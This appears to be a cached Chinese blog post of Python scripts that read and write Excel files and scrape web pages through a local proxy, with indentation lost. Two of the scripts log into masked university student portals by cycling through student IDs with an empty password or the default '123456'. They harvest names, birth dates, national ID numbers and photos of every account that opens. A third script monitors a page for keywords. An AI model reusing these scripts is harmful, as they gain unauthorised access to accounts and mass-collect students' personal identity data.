py读写Excel模拟登陆代理爬取
原文链接 http://code.lujq.me/2014/09/22/py%E8%AF%BB%E5%86%99Excel%E6%A8%A1%E6%8B%9F%E7%99%BB%E9%99%86%E4%BB%A3%E7%90%86%E7%88%AC%E5%8F%96/
注:以下为加速网络访问所做的原文缓存,经过重新格式化,可能存在格式方面的问题,或偶有遗漏信息,请以原文为准。
下列代码全部基于python3.4
<!--more-->
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time,random
print ("######## 确保关闭了所有的EXCEL,运行时不要打开任何EXCEL文件 ########")
rfile = xlrd.open_workbook('read.xls')
rfile.sheet_names()
rsheet = rfile.sheet_by_name(u'Sheet1')
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0
if os.path.exists(result):
while os.path.exists(result):
resultfilenum += 1
result = str(resultfilenum)+".xls"
resultfilenum -= 1
result = str(resultfilenum)+".xls"
wfile = xlrd.open_workbook(result)
wfile.sheet_names()
wsheet = wfile.sheet_by_name(u'Sheet1')
lasttask = wsheet.col_values(0)[-1]
for schnum in rsheet.col_values(0):
i += 1
if schnum == lasttask :
break
else :
resultfilenum -= 1
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
cookie = http.cookiejar.CookieJar()
cookieProc = urllib.request.HTTPCookieProcessor(cookie)
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)
headers = {
'User-Agent':'IE 6.0',
'Host':'www.*******.***************',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Referer':'http://www.*******.***************/login',
'Cookie':'JSESSIONID=8D46BD035D5B6AC1C443211A21245A27',
'Connection':'keep-alive'
}
fail = 0
k = 0
namer = 0
print ("############### 程序初始化完成 ##########")
#stop = int(input("输入运行几次后停止(0是一直循环下去): "))
stop = 0
for schnum in rsheet.col_values(0)[i:]:
k += 1
postdata=urllib.parse.urlencode({
"contextPath":'',
'contextName':'*******LoginPage',
'contextPara':'null',
'sectionName':'login',
'itemName':'loginAction',
'controlType':'frame',
'login_strLoginName':schnum,
"login_strPassword":''
}).encode(encoding='UTF8')
#发送给服务器的数据准备完毕
log = urllib.request.Request(
url = 'http://www.*******.***************/bsuims/bsMainFrameInit.do?',
data = postdata,
headers = headers
)
login = urllib.request.urlopen(log).read().decode("utf-8")
#发送POST请求传输数据,登陆成功
info1 = urllib.request.Request(
url = 'http://www.*******.***************/person/stuinfo_personInfoShow.do?personId=119937&admin=0&accessType=&visualType=1'
)
info1 = urllib.request.urlopen(info1).read().decode("utf-8")
info2 = urllib.request.Request(
url = 'http://www.*******.***************/person/stuinfo_stuTrainShow.do'
)
info2 = urllib.request.urlopen(info2).read().decode("utf-8")
if info1[240:250] == 'tml; chars' :
order1 = [0 for j in range(27)]
order2 = [0 for j in range(27)]
for j in range (1,27):
order1[j] = info1.find('</td>',order1[j-1]+1)
order2[j] = info2.find('</td>',order2[j-1]+1)
name = info1[info1.find('<td width="25%">')+25:order1[3]-8]
if (name == namer):
print('与上一个相同')
continue
namer = name
ename = info1[order1[4]+37:order1[5]-8].strip()
photoid = info1[info1.find('personId=',order1[5])+9:info1.find('&photoType')]
schoolnum = info1[info1.find('<td width="20%">')+25:order1[8]-8].strip()
if str(schoolnum) != str(schnum) :
print("在第"+str(k)+"次执行时循环变量与中间检测结果不符!程序已经终止,检查一下错……")
print("错误学号是:"+str(schnum),schoolnum)
break
if info1.find('女') > 0 :sex = '女'
if info1.find('男') > 0 :sex = '男'
nation = info1[info1.find('<td width="20%">',order1[15])+25:order1[16]-8]
brith = info1[info1.find('<td height="25" width="35%">',order1[21])+37:order1[22]-8]
idnum = info1[info1.find('<td>',order1[25])+13:order1[26]-8]
admissionnum = info2[info2.find('<td width="28%">')+25:order2[3]-8]
oversea = info2[info2.find('<td>',order2[6])+22:order2[7]-8]
brave = info2[info2.find('<td>',order2[8])+22:order2[9]-8]
college = info2[info2.find('<td>',order2[10])+13:order2[11]-8]
major = info2[info2.find('<td>',order2[14])+13:order2[15]-8]
clas = info2[info2.find('<td>',order2[18])+13:order2[19]-8]
campus = info2[info2.find('<td>',order2[20])+13:order2[21]-8]
degree = info2[info2.find('<td>',order2[22])+13:order2[23]-8]
wsheet.write(i,0,schnum)
wsheet.write(i,1,name)
# wsheet.write(i,2,sex)
wsheet.write(i,3,brith)
wsheet.write(i,4,college)
wsheet.write(i,5,major)
wsheet.write(i,6,clas)
wsheet.write(i,7,campus)
wsheet.write(i,8,degree)
wsheet.write(i,9,idnum)
wsheet.write(i,10,nation)
wsheet.write(i,11,oversea)
wsheet.write(i,12,brave)
wsheet.write(i,13,admissionnum)
wsheet.write(i,14,ename)
imgurl="http://www.*******.***************/person/stuinfo_downloadPhoto.do?personId="+str(photoid)+"&photoType=02"
# imgname=str(sex)+str(schnum)+str(name)+'.jpg'
imgname= str(schnum)+str(name)+'.jpg'
# urllib.request.urlretrieve(imgurl,imgname)
elif info1[240:250] == 'eturnlogin':
print('登录失败')
else:
print ("尝试登陆后得到的结果已经在上面打印,与预期不符,程序已经终止,检查错误吧")
break
wfile.save(result)
print ('第%d个已经完成'%(k))
i += 1
if k == stop :
break
#wfile.save(result)
print ('############################## 任务执行完毕 ########################')
print ("本次任务文件保存为 : "+result)
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time
def deal(info,i):
o = [0 for j in range(61)]
for j in range (1,61):
o[j] = info.find('<p align="center">',o[j-1])+18
imgurl = info[info.find('<p><img src=')+13:info.find('" ></p>')]
schoolnum = info[o[2]:o[2]+12]
if (int(schoolnum) != schnum):
print(str(schnum)+' ++++不存在++++ '+schoolnum)
return
name = info[o[4]:info.find('<',o[4])]
sex = info[o[8]:info.find('<',o[8])]
birth = info[o[10]:info.find('<',o[10])]
jiguan = info[o[14]:info.find('<',o[14])]
mianmao = info[o[16]:info.find('<',o[16])]
leibie = info[o[20]:info.find('<',o[20])]
college = info[o[22]:info.find('<',o[22])]
major = info[o[28]:info.find('<',o[28])]
lang = info[o[30]:info.find('<',o[30])]
kaoqu = info[o[32]:info.find('<',o[32])]
midsch = info[o[34]:info.find('<',o[34])]
goal = info[o[36]:info.find('<',o[36])]
# print(imgurl)
# print(schoolnum)
print(schnum,name)
# print(sex)
# print(birth)
# print(jiguan)
# print(mianmao)
# print(leibie)
# print(college)
# print(major)
# print(lang)
# print(kaoqu)
# print(midsch)
# print(goal)
wsheet.write(i,0,schoolnum)
wsheet.write(i,1,name)
wsheet.write(i,2,sex)
wsheet.write(i,3,birth)
wsheet.write(i,4,jiguan)
wsheet.write(i,5,mianmao)
wsheet.write(i,6,leibie)
wsheet.write(i,7,college)
wsheet.write(i,8,major)
wsheet.write(i,9,lang)
wsheet.write(i,10,kaoqu)
wsheet.write(i,11,midsch)
wsheet.write(i,12,goal)
wsheet.write(i,13,imgurl)
wfile.save(result)
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0
k = 0
l = 0
if os.path.exists(result):
while os.path.exists(result):
resultfilenum += 1
result = str(resultfilenum)+".xls"
resultfilenum -= 1
result = str(resultfilenum)+".xls"
wfile = xlrd.open_workbook(result)
wfile.sheet_names()
wsheet = wfile.sheet_by_name(u'Sheet1')
else :
resultfilenum -= 1
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
cookie = http.cookiejar.CookieJar()
cookieProc = urllib.request.HTTPCookieProcessor(cookie)
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)
headers = {
'User-Agent':'IE 6.0',
'Host':'*********:7890',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Referer':'http://*********:7890/zhxt_bks/xk_login.html',
'Cookie':'ACCOUNT=73654',
'Connection':'keep-alive'
}
#for schnum in rsheet.col_values(0)[i:]:
####################################################################
####################################################################
start = ******************
end = ******************
####################################################################
####################################################################
print ('程序初始化完成,将获取[%d]到[%d]的信息'%(start,end))
for schnum in range (start,end):
# schnum = int(schnum)
postdata=urllib.parse.urlencode({
'stuid':str(schnum),
'pwd':'123456'
}).encode(encoding='gbk')
log = urllib.request.Request(
url = 'http://*********:7890/pls/wwwbks/bks_login2.login',
data = postdata,
headers = headers
)
login = urllib.request.urlopen(log).read()
cheak = urllib.request.Request(
url = 'http://*********:7890/pls/wwwbks/bks_login2.loginmessage'
)
cheak = urllib.request.urlopen(cheak).read().decode('gbk')
if ('请先登录再使用!!!' in cheak):
print(str(schnum)+' 失败')
# wsheet.write(l,15,schnum)
# l += 1
# wfile.save(result)
elif ('你输入了错误的学号或密码' in cheak):
print(str(schnum)+' 不存在')
k += 1
if ( k == 20 ):
print('连续20个不存在')
break
elif ('登录成功!' in cheak ):
info = urllib.request.Request(
url = 'http://*********:7890/pls/wwwbks/bks_xj.xjcx'
)
info = urllib.request.urlopen(info).read().decode('gbk')
if (info[200:210] == 't language'):
deal(info,i)
i += 1
else:
print(cheak)
print(str(schnum)+'检查看看这是怎么了。')
break
print('文件保存为'+result)
监控关键词
import urllib.request,os,time
al = [
"http://*****************.html",
]
alt = ["****************",
]
def find(a):
lct = f.find(a)
lct1 = f[:lct].rfind(">")+1
lct2 = f.find("<",lct)
title = f[lct1:lct2]
lct3 = f[:lct1].rfind("data")
lct4 = f[:lct].rfind("html")
url = "http://******.com/htm_"+f[lct3:lct4]+"html"
if (url in al)or (title in alt):
print(title)
return
else:
print("标题:"+title)
print(url)
os.system('cmd')
time.sleep(80)
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo)
urllib.request.install_opener(opener)
li = ["关键词1","关键词2","关键词3"]
i = 0
while 1 :
while 1:
try:
f = urllib.request.urlopen('http://**************************').read().decode("gbk")[14800:-2400]
break
except:
print("失败")
i+=1
if (i / 5 == 0):
os.system('cmd')
time.sleep(150)
for a in li:
if (a in f):
find(a)
time.sleep(50)